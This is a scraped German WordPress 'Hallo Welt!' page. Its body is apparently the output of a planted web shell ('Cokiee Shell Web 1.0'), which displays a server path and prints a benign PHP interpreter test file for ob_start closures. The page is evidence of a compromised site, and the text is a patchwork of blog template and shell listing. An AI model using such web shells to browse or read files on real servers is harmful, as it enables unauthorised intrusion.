Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/general_functions/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/general_functions/ob_start_closures.phpt |
--TEST-- Test ob_start() function : closures as output handlers --INI-- output_buffering=0 --FILE-- <?php echo "*** Testing ob_start() : closures as output handlers ***\n"; ob_start(function ($output) { return 'Output (1): ' . $output; }); ob_start(function ($output) { return 'Output (2): ' . $output; }); echo "Test\nWith newlines\n"; $str1 = ob_get_contents (); ob_end_flush(); $str2 = ob_get_contents (); ob_end_flush(); echo $str1, $str2; ?> ===DONE=== --EXPECT-- *** Testing ob_start() : closures as output handlers *** Output (1): Output (2): Test With newlines Test With newlines Output (2): Test With newlines ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare